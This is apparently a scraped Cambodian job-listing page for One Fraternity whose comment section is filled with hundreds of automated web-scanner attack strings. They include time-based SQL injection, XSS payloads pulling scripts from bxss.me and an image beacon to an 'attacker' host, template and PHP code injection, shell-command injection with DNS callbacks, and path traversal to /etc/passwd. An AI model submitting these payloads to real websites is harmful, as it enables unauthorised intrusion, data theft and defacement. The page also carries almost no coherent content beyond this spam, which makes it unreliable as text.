ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

វ័ន ហ្រ្វេតធើនីធី ឯ.ក (វីតាល់ មីជាតិ)
One Fraternity is the leading company in marketing, sales and distribution in Cambodia. We understand the Cambodian market. We understand Cambodian consumers. We understand our customers. We grow your brands and we grow your market shares in Cambodia. 

ដាក់ពាក្យស្មើសុំការងារ (CV)!

ចំនួន CV ដែលបានដាក់ពាក្យរួច 38

សូមរៀបចំ CV ជាទម្រង់ Microsoft Word, PDF ឬជារូបភាព JPG។ ទំហំមិនធំជាង 5MB។


តម្រូវការជ្រើសរើសកម្លាំងពលកម្ម សរុប 13 កន្លែង

   
សំណួរ ចម្លើយ ឬ មតិយោបល់ ទៅក្រុមហ៊ុន

 • pHqghUme

  2021-05-06 08:42:54


  @@fyaBp


 • pHqghUme

  2021-05-06 08:42:48


  1'"


 • pHqghUme

  2021-05-06 08:42:47


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-06 08:42:24


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 08:42:03


  leSsX4tK')) OR 340=(SELECT 340 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:41:40


  g4uneY4R') OR 554=(SELECT 554 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:41:17


  G0ikaBK1' OR 178=(SELECT 178 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:40:57


  -1)) OR 56=(SELECT 56 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:40:39


  -5) OR 451=(SELECT 451 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:40:15


  -5 OR 198=(SELECT 198 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:39:48


  KF32jLiM'; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:39:28


  1 waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:39:08


  -1); waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:38:47


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:38:27


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • pHqghUme

  2021-05-06 08:38:05


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme

  2021-05-06 08:37:46


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-06 08:37:29


  if(now()=sysdate(),sleep(15),0)


 • pHqghUme

  2021-05-06 08:37:07


  -1' OR 2+206-206-1=0+0+0+1 or 'NhUrIc4o'='


 • pHqghUme

  2021-05-06 08:37:07


  -1" OR 2+134-134-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:37:06


  -1' OR 2+921-921-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:37:05


  -1 OR 2+901-901-1=0+0+0+1


 • pHqghUme

  2021-05-06 08:37:04


  -1 OR 2+839-839-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:37:03


  E1nrFlP5


 • pHqghUme

  2021-05-06 08:36:37


  1


 • pHqghUme

  2021-05-06 08:36:18


  1


 • @@qUqcZ

  2021-05-06 08:35:58


  1


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-06 08:35:55


  1


 • 1'"

  2021-05-06 08:35:55


  1


 • MJMFucu9')) OR 705=(SELECT 705 FROM PG_SLEEP(15))--

  2021-05-06 08:35:34


  1


 • cwDrjn8Y') OR 426=(SELECT 426 FROM PG_SLEEP(15))--

  2021-05-06 08:35:15


  1


 • zc6bQ9VO' OR 241=(SELECT 241 FROM PG_SLEEP(15))--

  2021-05-06 08:34:56


  1


 • VbH0UWhB'; waitfor delay '0:0:15' --

  2021-05-06 08:34:38


  1


 • 1 waitfor delay '0:0:15' --

  2021-05-06 08:34:23


  1


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-06 08:34:06


  1


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-06 08:33:49


  1


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-06 08:33:29


  1


 • if(now()=sysdate(),sleep(15),0)

  2021-05-06 08:33:16


  1


 • -1" OR 2+672-672-1=0+0+0+1 --

  2021-05-06 08:32:58


  1


 • -1' OR 2+902-902-1=0+0+0+1 --

  2021-05-06 08:32:57


  1


 • -1' OR 2+975-975-1=0+0+0+1 or 'K002es1U'='

  2021-05-06 08:32:57


  1


 • -1 OR 2+714-714-1=0+0+0+1 --

  2021-05-06 08:32:56


  1


 • -1 OR 2+672-672-1=0+0+0+1

  2021-05-06 08:32:56


  1


 • NOTc8IZr

  2021-05-06 08:32:55


  1


 • pHqghUme

  2021-05-06 08:32:35


  1


 • pHqghUme

  2021-05-06 08:32:13


  1


 • pHqghUme

  2021-05-06 08:31:53


  1


 • pHqghUme

  2021-05-06 08:31:47


  1


 • pHqghUme

  2021-05-06 08:31:46


  1


 • pHqghUme

  2021-05-06 08:31:24


  1


 • pHqghUme

  2021-05-06 08:30:59


  1


 • pHqghUme

  2021-05-06 08:30:37


  1


 • pHqghUme

  2021-05-06 08:29:54


  1


 • pHqghUme

  2021-05-06 08:29:26


  1


 • pHqghUme

  2021-05-06 08:28:55


  1


 • pHqghUme

  2021-05-06 08:28:30


  1


 • pHqghUme

  2021-05-06 08:28:08


  1


 • pHqghUme

  2021-05-06 08:27:40


  1


 • pHqghUme

  2021-05-06 08:27:15


  1


 • pHqghUme

  2021-05-06 08:27:15


  1


 • pHqghUme

  2021-05-06 08:27:14


  1


 • pHqghUme

  2021-05-06 08:27:14


  1


 • pHqghUme

  2021-05-06 08:27:13


  1


 • pHqghUme

  2021-05-06 08:27:12


  1


 • pHqghUme

  2021-05-06 08:26:49


  1


 • pHqghUme

  2021-05-06 08:26:24


  1


 • pHqghUme

  2021-05-06 08:26:02


  1


 • pHqghUme

  2021-05-06 08:25:58


  1


 • pHqghUme

  2021-05-06 08:25:56


  1


 • pHqghUme

  2021-05-06 08:25:36


  1


 • pHqghUme

  2021-05-06 08:25:11


  1


 • pHqghUme

  2021-05-06 08:24:49


  1


 • pHqghUme

  2021-05-06 08:24:39


  1<vMQZWc<


 • pHqghUme

  2021-05-06 08:24:34


  1<img sRc='http://attacker-9537/log.php?


 • pHqghUme

  2021-05-06 08:24:31


  1


 • pHqghUme

  2021-05-06 08:24:28


  1<UyyheC x=9584>


 • pHqghUme

  2021-05-06 08:24:22


  1<ifRAme sRc=9933.com></IfRamE>


 • pHqghUme

  2021-05-06 08:24:13


  1<WRFXBM>TY2Q8[!+!]</WRFXBM>


 • pHqghUme

  2021-05-06 08:24:09


  1


 • pHqghUme

  2021-05-06 08:24:03


  1YtNZe <ScRiPt >Hfib(9399)</ScRiPt>


 • pHqghUme

  2021-05-06 08:23:58


  1<% contenteditable onresize=Hfib(9031)>


 • pHqghUme

  2021-05-06 08:23:53


  1}body{acu:Expre/**/SSion(Hfib(9430))}


 • pHqghUme

  2021-05-06 08:23:51


  1


 • pHqghUme

  2021-05-06 08:23:48


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 08:23:41


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme

  2021-05-06 08:23:35


  1<input autofocus onfocus=Hfib(9072)>


 • pHqghUme

  2021-05-06 08:23:32


  1


 • pHqghUme

  2021-05-06 08:23:29


  1&lt;ScRiPt&gt;Hfib(9719)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-06 08:23:24


  1\u003CScRiPt\Hfib(9252)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-06 08:23:19


  %31%3C%53%63%52%69%50%74%20%3E%48%66%69%62%289063%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 08:23:15


  1


 • pHqghUme

  2021-05-06 08:23:10


  1<img/src=">" onerror=alert(9005)>


 • pHqghUme

  2021-05-06 08:23:02


  1<img src=xyz OnErRor=Hfib(9080)>


 • pHqghUme

  2021-05-06 08:22:58


  1


 • pHqghUme

  2021-05-06 08:22:57


  1<img src=//xss.bxss.me/t/dot.gif onload=Hfib(9223)>


 • pHqghUme

  2021-05-06 08:22:50


  1<body onload=Hfib(9814)>


 • pHqghUme

  2021-05-06 08:22:42


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9063'>


 • pHqghUme

  2021-05-06 08:22:38


  1


 • pHqghUme

  2021-05-06 08:22:37


  1


 • pHqghUme

  2021-05-06 08:22:36


  1


 • pHqghUme

  2021-05-06 08:22:35


  1<isindex type=image src=1 onerror=Hfib(9717)>


 • pHqghUme

  2021-05-06 08:22:35


  1


 • pHqghUme

  2021-05-06 08:22:34


  1


 • pHqghUme

  2021-05-06 08:22:33


  1


 • pHqghUme

  2021-05-06 08:22:25


  1<ScRiPt >Hfib(9924)</ScRiPt>


 • pHqghUme

  2021-05-06 08:22:20


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9878></ScRiPt>


 • pHqghUme

  2021-05-06 08:22:11


  1<ScRiPt >Hfib(9092)</ScRiPt>


 • pHqghUme

  2021-05-06 08:22:11


  1


 • pHqghUme

  2021-05-06 08:22:05


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%48%66%69%62%28%39%36%32%31%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 08:21:59


  1<script>Hfib(9228)</script>


 • pHqghUme

  2021-05-06 08:21:52


  1<WGRNUY>OK4UM[!+!]</WGRNUY>


 • pHqghUme

  2021-05-06 08:21:45


  1<ScRiPt >Hfib(9766)</ScRiPt>


 • pHqghUme

  2021-05-06 08:21:45


  1


 • pHqghUme

  2021-05-06 08:21:37


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-06 08:21:29


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 08:21:23


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-06 08:21:18


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 08:21:11


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 08:21:04


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-06 08:20:58


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 08:20:45


  acux7136%C0%BEz1%C0%BCz2a%90bcxuca7136


 • pHqghUme

  2021-05-06 08:20:38


  acu6047%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca6047


 • pHqghUme

  2021-05-06 08:20:30


  19772544


 • pHqghUme

  2021-05-06 08:20:18


  '"()&%<acx><ScRiPt >Hfib(9409)</ScRiPt>


 • pHqghUme

  2021-05-06 08:20:10


  1'"()&%<acx><ScRiPt >Hfib(9829)</ScRiPt>


 • pHqghUme<SK4FLm<

  2021-05-06 08:20:04


  1


 • pHqghUme<img sRc='http://attacker-9478/log.php?

  2021-05-06 08:19:54


  1


 • pHqghUme<Qutyd4 x=9324>

  2021-05-06 08:19:44


  1


 • pHqghUme<ifRAme sRc=9118.com></IfRamE>

  2021-05-06 08:19:37


  1


 • pHqghUme<WVIUHE>IKK21[!+!]</WVIUHE>

  2021-05-06 08:19:30


  1


 • pHqghUmeAZvk4 <ScRiPt >Hfib(9370)</ScRiPt>

  2021-05-06 08:19:22


  1


 • pHqghUme<% contenteditable onresize=Hfib(9721)>

  2021-05-06 08:19:16


  1


 • pHqghUme}body{acu:Expre/**/SSion(Hfib(9177))}

  2021-05-06 08:19:06


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 08:18:56


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 08:18:50


  1


 • pHqghUme<input autofocus onfocus=Hfib(9393)>

  2021-05-06 08:18:42


  1


 • pHqghUme&lt;ScRiPt&gt;Hfib(9103)&lt;/sCripT&gt;

  2021-05-06 08:18:15


  1


 • pHqghUme\u003CScRiPt\Hfib(9190)\u003C/sCripT\u003E

  2021-05-06 08:18:08


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%48%66%69%62%289568%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 08:18:02


  1


 • pHqghUme<img/src=">" onerror=alert(9523)>

  2021-05-06 08:17:56


  1


 • pHqghUme<img src=xyz OnErRor=Hfib(9011)>

  2021-05-06 08:17:45


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=Hfib(9476)>

  2021-05-06 08:17:39


  1


 • pHqghUme

  2021-05-06 08:17:38


  1


 • pHqghUme<body onload=Hfib(9694)>

  2021-05-06 08:17:31


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9645'>

  2021-05-06 08:17:24


  1


 • pHqghUme

  2021-05-06 08:17:16


  1


 • pHqghUme<isindex type=image src=1 onerror=Hfib(9421)>

  2021-05-06 08:17:14


  1


 • pHqghUme<ScRiPt >Hfib(9342)</ScRiPt>

  2021-05-06 08:17:05


  1


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9373></ScRiPt>

  2021-05-06 08:16:57


  1


 • pHqghUme<ScRiPt >Hfib(9211)</ScRiPt>

  2021-05-06 08:16:50


  1


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%48%66%69%62%28%39%30%30%36%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 08:16:39


  1


 • pHqghUme<script>Hfib(9476)</script>

  2021-05-06 08:16:29


  1


 • pHqghUme<W9HGFJ>UQLQQ[!+!]</W9HGFJ>

  2021-05-06 08:16:22


  1


 • pHqghUme<ScRiPt >Hfib(9366)</ScRiPt>

  2021-05-06 08:16:16


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 08:16:09


  1


 • acx__${98991*97996}__::.x

  2021-05-06 08:16:01


  1


 • acx[[${98991*97996}]]xca

  2021-05-06 08:15:51


  1


 • acx{{98991*97996}}xca

  2021-05-06 08:15:43


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 08:15:36


  1


 • <th:t="${acx}#foreach

  2021-05-06 08:15:28


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 08:15:23


  1


 • acux4214%C0%BEz1%C0%BCz2a%90bcxuca4214

  2021-05-06 08:15:17


  1


 • acu8655%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca8655

  2021-05-06 08:15:09


  1


 • pHqghUme9900032

  2021-05-06 08:14:59


  1


 • '"()&%<acx><ScRiPt >Hfib(9998)</ScRiPt>

  2021-05-06 08:14:48


  1


 • pHqghUme'"()&%<acx><ScRiPt >Hfib(9308)</ScRiPt>

  2021-05-06 08:14:42


  1


 • pHqghUme

  2021-05-06 08:14:34


  1


 • pHqghUme

  2021-05-06 08:14:26


  1


 • pHqghUme

  2021-05-06 08:14:18


  1


 • pHqghUme

  2021-05-06 08:14:09


  1


 • pHqghUme

  2021-05-06 08:14:03


  1


 • pHqghUme

  2021-05-06 08:14:00


  ${@print(md5(31337))}\


 • pHqghUme

  2021-05-06 08:14:00


  '.print(md5(31337)).'


 • pHqghUme

  2021-05-06 08:13:59


  ${@print(md5(31337))}


 • pHqghUme

  2021-05-06 08:13:58


  ";print(md5(31337));$a="


 • pHqghUme

  2021-05-06 08:13:57


  ';print(md5(31337));$a='


 • pHqghUme

  2021-05-06 08:13:56


  1


 • '.print(md5(31337)).'

  2021-05-06 08:13:56


  1


 • pHqghUme

  2021-05-06 08:13:56


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • ${@print(md5(31337))}\

  2021-05-06 08:13:55


  1


 • pHqghUme

  2021-05-06 08:13:54


  <!--


 • ";print(md5(31337));$a="

  2021-05-06 08:13:54


  1


 • pHqghUme

  2021-05-06 08:13:54


  `(nslookup hitijpdsftrvf0961e.bxss.me||perl -e "gethostbyname('hitijpdsftrvf0961e.bxss.me')")`


 • ${@print(md5(31337))}

  2021-05-06 08:13:54


  1


 • ';print(md5(31337));$a='

  2021-05-06 08:13:53


  1


 • pHqghUme

  2021-05-06 08:13:53


  |(nslookup hitmnvlqpcjbhddb21.bxss.me||perl -e "gethostbyname('hitmnvlqpcjbhddb21.bxss.me')")


 • pHqghUme

  2021-05-06 08:13:53


  '"


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-06 08:13:52


  1


 • <!--

  2021-05-06 08:13:52


  1


 • '"

  2021-05-06 08:13:51


  1


 • pHqghUme

  2021-05-06 08:13:51


  1


 • pHqghUme

  2021-05-06 08:13:50


  1


 • pHqghUme

  2021-05-06 08:13:50


  1


 • pHqghUme

  2021-05-06 08:13:49


  1


 • pHqghUme

  2021-05-06 08:13:49


  1


 • pHqghUme

  2021-05-06 08:13:49


  /xfs.bxss.me


 • pHqghUme

  2021-05-06 08:13:48


  1


 • /xfs.bxss.me

  2021-05-06 08:13:48


  1


 • pHqghUme

  2021-05-06 08:13:48


  1


 • pHqghUme

  2021-05-06 08:13:48


  $(nslookup hityyiuruwfzz45bc5.bxss.me||perl -e "gethostbyname('hityyiuruwfzz45bc5.bxss.me')")


 • pHqghUme

  2021-05-06 08:13:47


  1


 • pHqghUme

  2021-05-06 08:13:47


  1


 • pHqghUme

  2021-05-06 08:13:47


  (nslookup hitmkwsfhlxegaf425.bxss.me||perl -e "gethostbyname('hitmkwsfhlxegaf425.bxss.me')")


 • pHqghUme

  2021-05-06 08:13:46


  '+'A'.concat(70-3).concat(22*4).concat(119).concat(70).concat(100).concat(87)+(require'socket' Socket.gethostbyname('hitvz'+'eoaenrlm5ff91.bxss.me.')[3].to_s)+'


 • pHqghUme

  2021-05-06 08:13:46


  1


 • pHqghUme

  2021-05-06 08:13:46


  1


 • pHqghUme

  2021-05-06 08:13:46


  &echo qwisrg$()\ jqaigb\nz^xyu||a #' &echo qwisrg$()\ jqaigb\nz^xyu||a #|" &echo qwisrg$()\ jqaigb\nz^xyu||a #


 • pHqghUme

  2021-05-06 08:13:46


  |echo sbdqiq$()\ ckbfic\nz^xyu||a #' |echo sbdqiq$()\ ckbfic\nz^xyu||a #|" |echo sbdqiq$()\ ckbfic\nz^xyu||a #


 • pHqghUme

  2021-05-06 08:13:46


  1


 • pHqghUme

  2021-05-06 08:13:45


  "+"A".concat(70-3).concat(22*4).concat(111).concat(72).concat(114).concat(69)+(require"socket" Socket.gethostbyname("hitxu"+"deaoiniebf27c.bxss.me.")[3].to_s)+"


 • pHqghUme

  2021-05-06 08:13:45


  1


 • pHqghUme

  2021-05-06 08:13:45


  echo mhpxde$()\ rnsmkz\nz^xyu||a #' &echo mhpxde$()\ rnsmkz\nz^xyu||a #|" &echo mhpxde$()\ rnsmkz\nz^xyu||a #


 • pHqghUme

  2021-05-06 08:13:45


  bxss.me/t/xss.html?%00


 • '+'A'.concat(70-3).concat(22*4).concat(99).concat(76).concat(102).concat(79)+(require'socket' Socket.gethostbyname('hittu'+'rpqiyhvra7547.bxss.me.')[3].to_s)+'

  2021-05-06 08:13:44


  1


 • pHqghUme

  2021-05-06 08:13:44


  '"()


 • pHqghUme

  2021-05-06 08:13:44


  1


 • pHqghUme

  2021-05-06 08:13:44


  HttP://bxss.me/t/xss.html?%00


 • "+"A".concat(70-3).concat(22*4).concat(100).concat(72).concat(106).concat(73)+(require"socket" Socket.gethostbyname("hitld"+"ucjqbzhpa1f8e.bxss.me.")[3].to_s)+"

  2021-05-06 08:13:43


  1


 • HttP://bxss.me/t/xss.html?%00

  2021-05-06 08:13:43


  1


 • pHqghUme

  2021-05-06 08:13:43


  1


 • pHqghUme

  2021-05-06 08:13:43


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • bxss.me/t/xss.html?%00

  2021-05-06 08:13:43


  1


 • `(nslookup hitycrjayzbawc8d82.bxss.me||perl -e "gethostbyname('hitycrjayzbawc8d82.bxss.me')")`

  2021-05-06 08:13:42


  1


 • pHqghUme

  2021-05-06 08:13:42


  1


 • pHqghUme

  2021-05-06 08:13:42


  1


 • pHqghUme

  2021-05-06 08:13:42


  1


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-06 08:13:42


  1


 • |(nslookup hitshmqddvuza19980.bxss.me||perl -e "gethostbyname('hitshmqddvuza19980.bxss.me')")

  2021-05-06 08:13:41


  1


 • pHqghUme

  2021-05-06 08:13:41


  1


 • pHqghUme

  2021-05-06 08:13:41


  1


 • pHqghUme

  2021-05-06 08:13:41


  1


 • pHqghUme

  2021-05-06 08:13:41


  1


 • pHqghUme

  2021-05-06 08:13:40


  1


 • pHqghUme

  2021-05-06 08:13:40


  1


 • pHqghUme

  2021-05-06 08:13:40


  1


 • pHqghUme

  2021-05-06 08:13:40


  1


 • pHqghUme

  2021-05-06 08:13:40


  1


 • pHqghUme

  2021-05-06 08:13:40


  1


 • '"()

  2021-05-06 08:13:39


  1


 • pHqghUme

  2021-05-06 08:13:38


  http://bxss.me/t/fit.txt%3F.jpg


 • pHqghUme

  2021-05-06 08:13:38


  1&n985226=v926387


 • pHqghUme

  2021-05-06 08:13:38


  bxss.me


 • pHqghUme

  2021-05-06 08:13:37


  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡


 • $(nslookup hitbhrgpnisoi9deb2.bxss.me||perl -e "gethostbyname('hitbhrgpnisoi9deb2.bxss.me')")

  2021-05-06 08:13:37


  1


 • pHqghUme

  2021-05-06 08:13:36


  Http://bxss.me/t/fit.txt


 • (nslookup hitnsmbtakpfv71535.bxss.me||perl -e "gethostbyname('hitnsmbtakpfv71535.bxss.me')")

  2021-05-06 08:13:36


  1


 • pHqghUme

  2021-05-06 08:13:35


  ".gethostbyname(lc("hitun"."hhhoudng14da9.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(84).chr(116).chr(73)."


 • pHqghUme

  2021-05-06 08:13:35


  1


 • pHqghUme

  2021-05-06 08:13:35


  1some_inexistent_file_with_long_name%00.jpg


 • |echo qksqjc$()\ qquzrb\nz^xyu||a #' |echo qksqjc$()\ qquzrb\nz^xyu||a #|" |echo qksqjc$()\ qquzrb\nz^xyu||a #

  2021-05-06 08:13:35


  1


 • ".gethostbyname(lc("hitlm"."zhsphpfx6c457.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(88).chr(112).chr(65)."

  2021-05-06 08:13:34


  1


 • bxss.me

  2021-05-06 08:13:34


  1


 • echo ixbrbj$()\ yqqevf\nz^xyu||a #' &echo ixbrbj$()\ yqqevf\nz^xyu||a #|" &echo ixbrbj$()\ yqqevf\nz^xyu||a #

  2021-05-06 08:13:34


  1


 • pHqghUme

  2021-05-06 08:13:34


  '.gethostbyname(lc('hitcj'.'ykoewdum14965.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(77).chr(104).chr(81).'


 • pHqghUme

  2021-05-06 08:13:34


  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg


 • &echo tsqsja$()\ vlbyph\nz^xyu||a #' &echo tsqsja$()\ vlbyph\nz^xyu||a #|" &echo tsqsja$()\ vlbyph\nz^xyu||a #

  2021-05-06 08:13:34


  1


 • pHqghUme

  2021-05-06 08:13:33


  1


 • Http://bxss.me/t/fit.txt

  2021-05-06 08:13:33


  1


 • '.gethostbyname(lc('hitoe'.'wmqpaqub76953.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(90).chr(104).chr(67).'

  2021-05-06 08:13:33


  1


 • http://bxss.me/t/fit.txt%3F.jpg

  2021-05-06 08:13:33


  1


 • pHqghUme

  2021-05-06 08:13:32


  1


 • pHqghUme

  2021-05-06 08:13:32


  1


 • 1some_inexistent_file_with_long_name%00.jpg

  2021-05-06 08:13:32


  1


 • pHqghUme

  2021-05-06 08:13:31


  ^(#$!@#$)(()))******


 • pHqghUme

  2021-05-06 08:13:31


  1


 • pHqghUme

  2021-05-06 08:13:31


  1


 • http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2021-05-06 08:13:31


  1


 • pHqghUme&n970889=v906097

  2021-05-06 08:13:31


  1


 • pHqghUme

  2021-05-06 08:13:30


  )


 • pHqghUme

  2021-05-06 08:13:30


  1


 • pHqghUme

  2021-05-06 08:13:30


  !(()&&!|*|*|


 • pHqghUme

  2021-05-06 08:13:30


  1


 • pHqghUme

  2021-05-06 08:13:30


  1


 • pHqghUme

  2021-05-06 08:13:30


  1


 • !(()&&!|*|*|

  2021-05-06 08:13:29


  1


 • pHqghUme

  2021-05-06 08:13:29


  1


 • 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

  2021-05-06 08:13:29


  1


 • ^(#$!@#$)(()))******

  2021-05-06 08:13:29


  1


 • pHqghUme

  2021-05-06 08:13:29


  1


 • )

  2021-05-06 08:13:28


  1


 • pHqghUme

  2021-05-06 08:13:28


  1


 • pHqghUme

  2021-05-06 08:13:27


  1


 • pHqghUme

  2021-05-06 08:13:27


  1


 • pHqghUme

  2021-05-06 08:13:27


  1


 • pHqghUme

  2021-05-06 08:13:26


  1


 • pHqghUme

  2021-05-06 08:13:26


  1


 • pHqghUme

  2021-05-06 08:13:26


  1


 • pHqghUme

  2021-05-06 08:13:26


  1


 • pHqghUme

  2021-05-06 08:13:25


  1


 • pHqghUme

  2021-05-06 08:13:25


  1


 • pHqghUme

  2021-05-06 08:13:25


  1


 • pHqghUme

  2021-05-06 08:13:25


  1


 • pHqghUme

  2021-05-06 08:13:24


  1


 • pHqghUme

  2021-05-06 08:13:24


  1


 • pHqghUme

  2021-05-06 08:13:24


  1


 • pHqghUme

  2021-05-06 08:13:24


  1


 • pHqghUme

  2021-05-06 08:13:23


  1


 • pHqghUme

  2021-05-06 08:13:23


  1


 • pHqghUme

  2021-05-06 08:13:23


  ../1


 • pHqghUme

  2021-05-06 08:13:22


  1


 • pHqghUme

  2021-05-06 08:13:21


  ../../../../../../../../../../../../../../etc/passwd


 • pHqghUme

  2021-05-06 08:13:21


  ../../../../../../../../../../../../../../windows/win.ini


 • pHqghUme

  2021-05-06 08:13:20


  1


 • ../pHqghUme

  2021-05-06 08:13:20


  1


 • pHqghUme

  2021-05-06 08:13:20


  1


 • ../../../../../../../../../../../../../../windows/win.ini

  2021-05-06 08:13:19


  1


 • pHqghUme

  2021-05-06 08:13:19


  1


 • pHqghUme

  2021-05-06 08:13:18


  1


 • pHqghUme

  2021-05-06 08:13:18


  1


 • ekV3WTI5YnQ=

  2021-05-06 08:13:18


  1


 • pHqghUme

  2021-05-06 08:13:17


  1


 • ../../../../../../../../../../../../../../etc/passwd

  2021-05-06 08:13:17


  1


 • pHqghUme

  2021-05-06 08:13:16


  ${9999018+9999469}


 • pHqghUme

  2021-05-06 08:13:16


  1


 • pHqghUme

  2021-05-06 08:13:15


  1


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-06 08:13:15


  1


 • ${10000421+9999881}

  2021-05-06 08:13:15


  1


 • pHqghUme

  2021-05-06 08:13:15


  1<esi:include src="http://bxss.me/rpb.png"/>


 • pHqghUme

  2021-05-06 08:13:15


  1


 • pHqghUme

  2021-05-06 08:13:14


  1


 • pHqghUme

  2021-05-06 08:13:14


  1


 • pHqghUme

  2021-05-06 08:13:14


  1


 • pHqghUme

  2021-05-06 08:13:13


  1


 • pHqghUme

  2021-05-06 08:13:13


  1


 • pHqghUme

  2021-05-06 08:13:13


  1


 • pHqghUme

  2021-05-06 08:13:13


  1


 • pHqghUme

  2021-05-06 08:13:13


  1


 • pHqghUme

  2021-05-06 08:13:13


  1


 • pHqghUme

  2021-05-06 08:13:12


  1


 • pHqghUme

  2021-05-06 08:13:12


  1


 • pHqghUme

  2021-05-06 08:13:12


  1


 • pHqghUme

  2021-05-06 08:13:12


  1


 • pHqghUme

  2021-05-06 08:13:11


  1


 • pHqghUme

  2021-05-06 08:13:11


  1


 • pHqghUme

  2021-05-06 08:13:10


  1


 • pHqghUme

  2021-05-06 08:13:08


  1


 • pHqghUme

  2021-05-06 08:13:06


  7IXwxUKx


 • pHqghUme

  2021-05-06 08:13:05


  '+response.write(9460775*9438399)+'


 • KsHGpmxi

  2021-05-06 08:13:05


  1


 • pHqghUme

  2021-05-06 08:13:05


  "+response.write(9460775*9438399)+"


 • pHqghUme

  2021-05-06 08:13:04


  1


 • pHqghUme

  2021-05-06 08:13:04


  response.write(9460775*9438399)


 • pHqghUme

  2021-05-06 08:13:04


  1


 • '+response.write(9185543*9551408)+'

  2021-05-06 08:13:03


  1


 • "+response.write(9185543*9551408)+"

  2021-05-06 08:13:03


  1


 • response.write(9185543*9551408)

  2021-05-06 08:13:02


  1


 • pHqghUme

  2021-05-06 08:13:01


  1


 • pHqghUme

  2021-05-06 08:13:01


  1


 • pHqghUme

  2021-05-06 08:13:00


  1


 • pHqghUme

  2021-05-06 08:12:59


  1


 • pHqghUme

  2021-05-06 08:12:58


  1


 • pHqghUme

